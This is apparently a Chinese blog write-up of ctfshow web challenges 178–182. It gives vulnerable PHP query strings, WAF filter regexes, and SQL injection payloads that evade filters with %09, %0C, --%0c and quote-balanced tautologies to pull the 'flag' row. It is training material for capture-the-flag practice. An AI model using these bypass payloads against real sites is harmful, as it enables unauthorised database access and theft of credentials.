ctfshow-web入门-sql注入-178-182


web178

查询语句

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
      
返回逻辑

//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }
      

实验以后过滤了空格和*号,还是可以使用一句话,或者把上一题的/**/换成%09

解法一

payload:1'or(1=1)%23

解法二

payload:1'%09union%09select%09id,username,password%09from%09ctfshow_user%09where%09username='flag'%09limit%091,1%23

web179

查询语句

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
      
返回逻辑

//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }
      

实验以后过滤了空格和*号还有%0A,还是可以使用一句话,或者把上一题的%09换成%0C

解法一

payload:1'or(1=1)%23

解法二

payload:1'%0Cunion%0Cselect%0Cid,username,password%0Cfrom%0Cctfshow_user%0Cwhere%0Cusername='flag'%0Climit%0C1,1%23

web180

查询语句

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
      
返回逻辑

//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

实验以后过滤了空格和*号还有%0A和%23,还是可以使用一句话,或者把上一题的%23换成–%0C

解法一

payload:1'or(1=1)--%0c

解法二

payload:1'%0Cunion%0Cselect%0Cid,username,password%0Cfrom%0Cctfshow_user%0Cwhere%0Cusername='flag'%0Climit%0C1,1--%0c

web181

查询语句

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
      
返回逻辑

//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i', $str);
  }
      

他过滤的参数都写出来了,我们可以使用一句话,稍微改改

payloadf'or(username='flag')and'a'='a

web182

查询语句

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
      
返回逻辑

//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select|flag/i', $str);
  }
      

多过滤了flag,只能直接查id了,payloadf'or(id=26)and'a'='a


文章作者: Rolemee
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Rolemee !
  目录